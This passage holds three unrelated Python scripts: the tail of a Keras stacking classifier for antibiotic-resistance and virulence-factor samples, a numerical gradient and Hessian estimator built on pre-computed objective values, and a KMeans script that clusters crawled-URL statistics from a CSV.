    held-out second-level test data, in that order.
    """
    input_dim = blend_train_data.shape[1]
    output_dim = len(set(blend_train_label))  # kept from the original; unused

    # Funnel of dense ReLU layers (4096 -> 1024 -> 256 -> 64 -> 16 -> 4),
    # each followed by a light dropout, ending in a single sigmoid unit.
    inputs = keras.Input(shape=(input_dim,))
    x = inputs
    for width_exp in (12, 10, 8, 6, 4, 2):
        x = keras.layers.Dense(2 ** width_exp, activation="relu")(x)
        x = keras.layers.Dropout(0.05, noise_shape=None, seed=None)(x)
    outputs = keras.layers.Dense(1, activation="sigmoid")(x)

    model = keras.Model(inputs, outputs)
    model.compile(
        optimizer=keras.optimizers.SGD(learning_rate=0.05, momentum=0.9),
        loss=keras.losses.BinaryCrossentropy(),
        metrics=[keras.metrics.BinaryAccuracy(name="acc")],
    )

    # Full-batch training: batch size equals the number of training rows.
    batch_size = blend_train_data.shape[0]
    train_dataset = tf.data.Dataset.from_tensor_slices((blend_train_data, blend_train_label)).batch(batch_size)
    test_dataset = tf.data.Dataset.from_tensor_slices((blend_test_data, blend_test_label)).batch(batch_size)
    test_dataset2 = tf.data.Dataset.from_tensor_slices((second_test_data)).batch(batch_size)

    callbacks = [
        EarlyStopping('val_acc', patience=100),
        keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.01,
                                          patience=100, min_lr=0.01),
    ]
    history = model.fit(train_dataset, epochs=500, validation_data=test_dataset, callbacks=callbacks)

    # Score both evaluation sets with the trained model.
    prediction1 = model.predict(test_dataset)
    prediction2 = model.predict(test_dataset2)
    return prediction1, prediction2
def DL_OHE(train_name, train_label, test_name,test_label,OneHot_Feature):
    """Second-level stacking on one-hot encoded features.

    Joins each sample name against `OneHot_Feature` (rows appear to be
    [name, feat1, feat2, ...] — TODO confirm against the caller), trains
    the DNN out-of-fold with 5-fold CV and returns:
      - final_blend_train: [true_label, oof_prediction] per training row
      - fianl_blend_test_mean: [true_label, mean prediction over the 5
        folds] per test row
    Labels are compared as the strings "1" (ARG), "2" (VF) and
    "3" (negative). NOTE(review): "1" rows are skipped in training but
    mapped to 0 in the test set — confirm this asymmetry is intended.
    """
    # ---- assemble [binary_label, one-hot features] rows for training ----
    second_train_label_feature = []
    for second_i in range(train_label.shape[0]):
        pair = []
        if train_label[second_i] == "1":  # ARG: excluded from training
            continue
        if train_label[second_i] == "2":  # VF -> positive class
            pair.append(1)
        if train_label[second_i] == "3":  # Negative -> negative class
            pair.append(0)
        # linear scan to join the sample name with its one-hot feature row
        for second_i3 in range(len(OneHot_Feature)):
            if train_name[second_i] == OneHot_Feature[second_i3][0]:
                pair.extend(OneHot_Feature[second_i3][1:])
                break
        second_train_label_feature.append(pair)
    # ---- same assembly for the test set ("1" is kept, mapped to 0) ----
    second_test_label_feature = []
    for second_i in range(test_label.shape[0]):
        pair = []
        if test_label[second_i] == "1":
            pair.append(0)
        if test_label[second_i] == "2":
            pair.append(1)
        if test_label[second_i] == "3":
            pair.append(0)
        for second_i3 in range(len(OneHot_Feature)):
            if test_name[second_i] == OneHot_Feature[second_i3][0]:
                pair.extend(OneHot_Feature[second_i3][1:])
                break
        second_test_label_feature.append(pair)
    # ---- split the assembled rows into label (col 0) and features ----
    second_train_label_feature = np.array(second_train_label_feature, dtype=float)
    second_train_data = second_train_label_feature[:, 1:]
    second_train_label = second_train_label_feature[:, 0]
    second_train_label = second_train_label.astype(int)
    second_train_data = second_train_data.astype(float)
    second_test_label_feature = np.array(second_test_label_feature, dtype=float)
    second_test_data = second_test_label_feature[:, 1:]
    second_test_label = second_test_label_feature[:, 0]
    second_test_label = second_test_label.astype(int)
    second_test_data = second_test_data.astype(float)
    print('Train Data:', second_train_data.shape)
    print('Test Data:', second_test_data.shape)
    # ---- 5-fold out-of-fold stacking ('fianl' typo kept from original) ----
    final_blend_train = []
    fianl_blend_test = []
    k2 = 0
    skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=10)
    for blend_train_index, blend_test_index in skf.split(second_train_data, second_train_label):
        blend_train_data, blend_train_label = second_train_data[blend_train_index], second_train_label[
            blend_train_index]
        blend_test_data, blend_test_label = second_train_data[blend_test_index], second_train_label[blend_test_index]
        clf1_pred_proba, clf1_pred_proba2 = Second_Model_DNN_One_HOT(blend_train_data, blend_train_label,
                                                                     blend_test_data,
                                                                     blend_test_label, second_test_data)
        # out-of-fold predictions become training data for the next level
        for num_i in range(len(blend_test_label)):
            pair = []
            pair.append(blend_test_label[num_i])
            pair.append(clf1_pred_proba[num_i])
            final_blend_train.append(pair)
        # test predictions are appended once per fold (5 stacked copies)
        for num_j in range(len(second_test_label)):
            pair = []
            pair.append(second_test_label[num_j])
            pair.append(clf1_pred_proba2[num_j])
            fianl_blend_test.append(pair)
        k2 += 1
    # ---- average the 5 per-fold test predictions for each test row ----
    fianl_blend_test_mean = []
    for num_k in range(int(len(fianl_blend_test) / 5)):
        pair = []
        pair.append(fianl_blend_test[num_k][0])
        for num_q in range(1, len(fianl_blend_test[num_k])):
            # the 5 copies of row num_k are offset by len(second_test_label)
            mean_num = (fianl_blend_test[num_k][num_q] + fianl_blend_test[num_k + len(second_test_label)][num_q] +
                        fianl_blend_test[num_k + len(second_test_label) * 2][num_q] +
                        fianl_blend_test[num_k + len(second_test_label) * 3][num_q] +
                        fianl_blend_test[num_k + len(second_test_label) * 4][num_q]) / 5
            # mean_num is a length-1 prediction array; keep the scalar
            pair.append(mean_num[0])
        fianl_blend_test_mean.append(pair)
    # thresholded labels at 0.5 — computed but never used or returned
    y_score0 = []
    for i in range(len(fianl_blend_test_mean)):
        if float(fianl_blend_test_mean[i][1]) >= 0.5:
            y_score0.append(1)
        else:
            y_score0.append(0)
    second_test_label = list(second_test_label)
    return final_blend_train, fianl_blend_test_mean
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
import pandas as pd
import os
import ObjEval_ES_ILS as obj
import pylab as pl
import itertools
''' to compute all possible permutations
# using itertools.product()'''
def get_score(parameter, lib, res):
    """Return the result recorded for *parameter*.

    `lib` holds previously evaluated parameter tuples and `res` holds the
    corresponding results, in matching order.
    """
    return res[lib.index(tuple(parameter))]
def f(beta):
    """Return the pre-computed (negated-penalty) objective value for *beta*.

    `Population` and `pnt` are module-level lookup tables filled in by the
    __main__ section: `Population` lists the evaluated parameter vectors and
    `pnt` the corresponding values, so no objective evaluation happens here.
    """
    global Population, pnt, score
    return pnt[Population.index(beta)]
def f_1(beta, pos):
    """Estimate the first derivative of f at *beta* along coordinate *pos*.

    Returns a (backward, forward) pair of one-sided difference quotients.
    """
    center = list(beta)
    # Relative step of 1% of each coordinate, floored at 1e-4 so that
    # near-zero coordinates still get a usable step size.
    step = abs(0.01 * np.array(beta))
    for k in range(len(step)):
        if step[k] < 0.0001:
            step[k] = 0.0001
    lo, hi = list(center), list(center)
    lo[pos] -= step[pos]
    hi[pos] += step[pos]
    backward = (f(lo) - f(beta)) / -step[pos]
    forward = (f(hi) - f(beta)) / step[pos]
    return backward, forward
def f_2(beta, loc):
    """Estimate the mixed second derivative of f at *beta*.

    *loc* is a pair (d_1, d_2) of coordinate indices; only backward
    differences are used, matching f_1's backward component.
    """
    d_1, d_2 = loc[0], loc[1]
    # 1% relative step, floored at 1e-4 (same scheme as f_1)
    step = abs(0.01 * np.array(beta))
    for k in range(len(step)):
        if step[k] < 0.0001:
            step[k] = 0.0001
    shifted = list(beta)
    shifted[d_2] -= step[d_2]  # backward-shift coordinate d_2 only
    return (f_1(shifted, d_1)[0] - f_1(beta, d_1)[0]) / -step[d_2]
if __name__ == '__main__':
    # Numerically estimate the gradient, Hessian and variance of the
    # objective at the optimum B_star, using the pre-computed evaluations
    # stored in an Excel sheet (looked up through f/f_1/f_2 above).
    # np.set_printoptions(precision=3)
    # * ---------------- Read Evaluation results ---------------- *
    # Load the parameter-evaluation results; `pnt` is the negated penalty
    # column, `score` the score column. Indexed by the parameter column.
    evaluation_result = pd.read_excel(
        os.path.join(os.path.dirname(__file__), 'objective value evaluation', 'Dec5',
                     'Iteration result for t value evaluation.xlsx'),
        index_col=1)
    pnt = list(-evaluation_result.penalty)
    score = list(evaluation_result.score)
    # * ---------------- Generate the values to evaluate ---------------- *
    sway = 0.01  # relative perturbation size (1%)
    '''Generate the values to evaluate'''
    possible_values = []
    '''generate near values for B*'''
    cnt = 0
    # set optimum
    # B_star = [-1., -0.036, 1.002, 0.108]
    B_star = obj.B_star
    # get epsilon (kept positive)
    epsilon = abs(np.array(B_star) * sway)
    # Perturb each of the 4 coordinates of B* up and down by epsilon.
    for i in range(len(B_star)):
        _ = np.array([0, 0, 0, 0])
        _[i] = 1
        possible_values.append(list(np.array(B_star) + epsilon * _))
        print('No. {}: {}, modified at position {}, + '.format(cnt, list(np.array(B_star) + epsilon * _), i))
        cnt += 1
        possible_values.append(list(np.array(B_star) - epsilon * _))
        print('No. {}: {}, modified at position {}, - '.format(cnt, list(np.array(B_star) - epsilon * _), i))
        cnt += 1
    # Near-values additionally needed for the second derivatives.
    for i in range(len(B_star)):
        Beta = list(B_star)
        # Shift the 'optimum' (center value) backward along coordinate i —
        # second derivatives use backward differences only (see f_2).
        Beta[i] -= epsilon[i]
        print('\nCurrent beta: {}\n'.format(Beta))
        # step size relative to the shifted center (kept positive)
        _epsilon = abs(np.array(Beta) * sway)
        for j in range(len(Beta)):
            _ = np.array([0, 0, 0, 0])
            _[j] = 1
            possible_values.append(list(np.array(Beta) + _epsilon * _))
            print('No. {}: {}, modified at position {}, + '.format(cnt, list(np.array(Beta) + _epsilon * _), j))
            cnt += 1
            possible_values.append(list(np.array(Beta) - _epsilon * _))
            print('No. {}: {}, modified at position {}, - '.format(cnt, list(np.array(Beta) - _epsilon * _), j))
            cnt += 1
    # finally append B* itself
    possible_values.append(list(np.array(B_star)))
    # Deduplicate: mark later occurrences of identical vectors for removal.
    flag, duplicate_idx = 0, []
    for i in range(len(possible_values)):
        for j in range(len(possible_values)):
            if j > i:
                if possible_values[i] == possible_values[j]:
                    # print('Duplicate: {}: {} and {}: {}.'.format(i, possible_values[i], j, possible_values[j]))
                    duplicate_idx.append(j)
                    flag = 1
    # `Population` is the module-level lookup table consumed by f().
    # NOTE(review): assumes its order matches the rows of `pnt` from the
    # Excel sheet — confirm.
    Population = [possible_values[i] for i in range(len(possible_values)) if i not in duplicate_idx]
    # ---------------------------- Setup ------------------------- #
    # set parameters (re-set here; identical to the values above)
    sway = 0.01
    # set optimum
    B_star = obj.B_star
    # get epsilon (kept positive)
    epsilon = abs(np.array(B_star) * sway)
    # calculate gradient
    Gradient = []
    # ---------------------------- Calculation ------------------------- #
    # gradient: (backward, forward) quotient pair per coordinate
    for i in range(len(B_star)):
        Gradient.append(f_1(B_star, i))
    # calculate second derivative
    SecondDerivative = []
    # full Hessian via mixed backward differences
    for i in range(len(B_star)):
        temp = []
        for j in range(len(B_star)):
            temp.append(f_2(B_star, [i, j]))
        SecondDerivative.append(temp)
    Gradient = np.array(Gradient)
    SecondDerivative = np.array(SecondDerivative)
    # ---------------------------- calculate pesudo t value ------------------------- #
    # Inverse Hessian as the variance matrix; diagonal gives std errors.
    variance = np.linalg.inv(SecondDerivative)
    std_err = np.sqrt(np.diag(variance))
    # ---------------------------- print results ------------------------- #
    print('The numerical gradient matrix: \n {}\n'.format(Gradient))
    # print second derivatives
    print('The Hessian matrix:\n {}'.format(SecondDerivative))
    # print variance matrix
    print('The variance matrix:\n {}'.format(variance))
import csv
from sklearn.cluster import KMeans

# Cluster the rows of output.csv with KMeans and write each row, tagged
# with its cluster label, to clustered_output_<K>.csv.
K = 5  # number of clusters

data_arr = []       # numeric feature rows fed to KMeans
url_name_arr = []   # first column of each row (the URL), kept for output
MY_FILE = 'output.csv'
top_row = []        # header row of the input CSV

# Map categorical error types onto small integers so KMeans can use them.
errors = {"HttpError": 1, "DNSLookupError": 2, "TimeoutError": 3, "Other": 4}

# Python 3: csv files are opened in text mode with newline='' (the original
# Python 2 'rb'/'wb' convention breaks under Python 3).
with open(MY_FILE, 'r', newline='') as f:
    reader = csv.reader(f)
    for row_idx, row in enumerate(reader):
        if row_idx == 0:
            top_row = row
            continue
        data = []
        # (renamed from `i`, which shadowed the outer loop index)
        for col_idx, e in enumerate(row):
            if col_idx == 0:
                url_name_arr.append(e)
            elif '[' in e and ']' in e:
                # bracketed list-like field: use its content length as the feature
                data.append(len(e) - 2)
            elif e.isdigit():
                data.append(int(e))
            elif e in errors:
                data.append(errors[e])
            else:
                # Missing/unparseable value: substitute a column-specific default.
                if "status" in top_row[col_idx]:
                    data.append(500)
                elif "flags" in top_row[col_idx]:
                    data.append(0)
                elif "number_of_tags" in top_row[col_idx]:
                    data.append(1500)
                elif "length" in top_row[col_idx]:
                    data.append(2000)
                elif "error_message" in top_row[col_idx]:
                    data.append(0)
                elif "error_type" in top_row[col_idx]:
                    data.append(5)
        if data:
            data_arr.append(data)

top_row.append("Label")

# The original never closed the output file; `with` guarantees it.
with open("clustered_output_" + str(K) + ".csv", "w", newline='') as output_file:
    output_writer = csv.writer(output_file)
    output_writer.writerow(top_row)

    # computing K-Means with K (clusters)
    estimator = KMeans(n_clusters=K)
    estimator.fit_predict(data_arr)
    labels = estimator.labels_

    # One section per cluster: every member row plus its cluster label.
    for k in range(K):
        c = 0
        for i in range(len(data_arr)):
            if labels[i] == k:
                c += 1
                output_writer.writerow([url_name_arr[i]] + data_arr[i] + [k])
        print("Cluster " + str(k) + " size: " + str(c))

    output_writer.writerow([])
    output_writer.writerow(["Results"])
    # Append each cluster centroid, tagged with its cluster index.
    for k, cluster_center in enumerate(estimator.cluster_centers_):
        output_writer.writerow(["Cluster"] + list(cluster_center) + [k])
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.